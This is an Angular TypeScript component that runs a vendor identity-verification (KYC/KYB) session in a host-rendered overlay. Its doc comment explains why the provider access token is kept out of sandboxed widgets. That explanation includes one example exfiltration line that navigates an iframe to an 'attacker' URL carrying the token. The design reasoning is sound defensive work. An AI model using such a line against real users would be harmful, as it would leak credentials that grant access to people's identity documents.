import { AfterViewInit, Component, OnInit, inject } from '@angular/core';
import { KycLevel } from '@finxone-platform/shared/sys-config-types';
import { BrnDialogRef, injectBrnDialogContext } from '@spartan-ng/brain/dialog';
import SumsubWebSdk from '@sumsub/websdk';
import { MetadataService } from '../../../lib/services/metadata-service/metadata-service.service';

/** Dialog context supplied by IdentityVerificationService. */
export interface IdentityVerificationContext {
  /** Provider access token from POST /verification-provider/get-token. */
  accessToken: string;
  level: KycLevel;
  /** Prefill values the provider session was minted with. */
  email?: string;
  phone?: string;
  /** Raw CSS custom-property string, so the vendor UI matches the app theme. */
  themeVariables: string;
}

/** How the overlay closed. There is no "verified" outcome — see the class docs. */
export type IdentityVerificationResult = { dismissed: true } | { failed: string };

/**
 * Host-rendered identity-verification overlay: the only place a custom widget's
 * KYC/KYB session is ever run.
 *
 * ## Why the widget cannot host this
 *
 * Two independent reasons, either of which would be enough:
 *
 * 1. **The provider access token is a credential for the customer's identity
 *    documents.** A sandboxed iframe can always navigate itself
 *    (`location.href = 'https://attacker/?token=…'`) and no CSP directive
 *    prevents it, so a token handed to a widget bundle is exfiltratable by that
 *    bundle or by anything it loaded. Same rule as card secrets.
 * 2. **The vendor SDK could not run there anyway.** It needs camera access,
 *    loads its own cross-origin frames and fetches from the provider's origin —
 *    all of which the widget sandbox denies by design.
 *
 * So the host fetches the token, opens this overlay and launches the vendor here.
 * The widget is told `{ launched: true }` and learns the outcome from the
 * `onboardingStatus` data topic, which the host polls — the decision arrives as a
 * webhook into the *backend*, so there is nothing to push at the moment the
 * vendor session closes.
 *
 * ## What "closed" means
 *
 * Nothing. The vendor's completion event means documents were submitted, not that
 * verification passed; the decision is asynchronous. This overlay therefore has
 * no success outcome to report and the service does not wait for it to close.
 *
 * Deliberately mirrors the native KYC flow (kyc-provider.component.ts): the same
 * vendor configuration, the same theme injection, and the same
 * update-applicant-company call on a business-level applicant.
 */
@Component({
  standalone: false,
  selector: 'finxone-web-frontend-identity-verification',
  templateUrl: './identity-verification.component.html',
  styleUrl: './identity-verification.component.scss',
})
export class IdentityVerificationComponent implements OnInit, AfterViewInit {
  /** The vendor mounts into this id; it must exist in host DOM before launch. */
  public static readonly containerId = 'fx-identity-verification-container';

  private readonly dialogRef = inject<BrnDialogRef<IdentityVerificationResult>>(BrnDialogRef);
  private readonly context = injectBrnDialogContext<IdentityVerificationContext>();
  private readonly metadataService = inject(MetadataService);

  public containerId = IdentityVerificationComponent.containerId;
  public error?: string;
  public submitted = false;

  /** Guards the one re-launch the business flow needs (see onApplicantLoaded). */
  private companyInfoSent = false;

  ngOnInit(): void {
    this.containerId = IdentityVerificationComponent.containerId;
  }

  ngAfterViewInit(): void {
    this.launch();
  }

  public onDismiss(): void {
    this.dialogRef.close({ dismissed: true });
  }

  private launch(): void {
    try {
      this.buildSdk().launch(`#${this.containerId}`);
    } catch (error) {
      // A vendor bootstrap failure is the host's problem to show, but its
      // message can name provider internals — keep it out of anything the widget
      // sees (the service maps every failure to one generic host error).
      this.error = 'Identity verification could not be started. Please try again.';
      console.error('identity-verification: vendor SDK failed to launch', error);
    }
  }

  private buildSdk() {
    return (
      SumsubWebSdk.init(this.context.accessToken, () =>
        // Token refresh: the host mints session tokens, and a widget-initiated
        // session is short-lived by design, so an expired token ends the session
        // rather than silently renewing it behind the customer's back.
        Promise.resolve(''),
      )
        .withConf({
          lang: 'en',
          email: this.context.email,
          phone: this.context.phone,
          uiConf: { customCssStr: `:root {\n  ${this.context.themeVariables}\n}` },
        })
        .withOptions({ addViewportTag: false, adaptIframeHeight: true })
        .on('idCheck.onApplicantStatusChanged', (payload) => this.onVendorStatus(payload))
        .on('idCheck.applicantStatus', (payload) => this.onVendorStatus(payload))
        .on('idCheck.onApplicantLoaded', (payload) => this.onApplicantLoaded(payload.applicantId))
        .on('idCheck.onError', (error) => {
          this.error = 'Identity verification reported a problem. Please try again.';
          console.error('identity-verification: vendor error', error);
        })
        .build()
    );
  }

  private onVendorStatus(payload: { reviewStatus?: string }): void {
    // 'completed' means the documents are in, not that the applicant passed. The
    // host keeps the overlay open so the vendor can show its own closing screen;
    // the real outcome reaches the widget through onboardingStatus.
    if (payload?.reviewStatus === 'completed') this.submitted = true;
  }

  /**
   * Business applicants need the company attached to the applicant before the
   * questionnaire renders, and the vendor SDK has to be re-launched once after
   * that call — native parity with kyc-provider.component.ts. Guarded so it
   * happens at most once per overlay, rather than the native flow's
   * localStorage flag.
   */
  private onApplicantLoaded(applicantId: string): void {
    if (this.context.level !== KycLevel.BUSINESS || this.companyInfoSent) return;
    this.companyInfoSent = true;
    this.metadataService.setCompanyInfo(applicantId).subscribe({
      next: () => this.launch(),
      error: (error) => {
        this.error = 'Company details could not be attached to this verification.';
        console.error('identity-verification: update-applicant-company failed', error);
      },
    });
  }
}
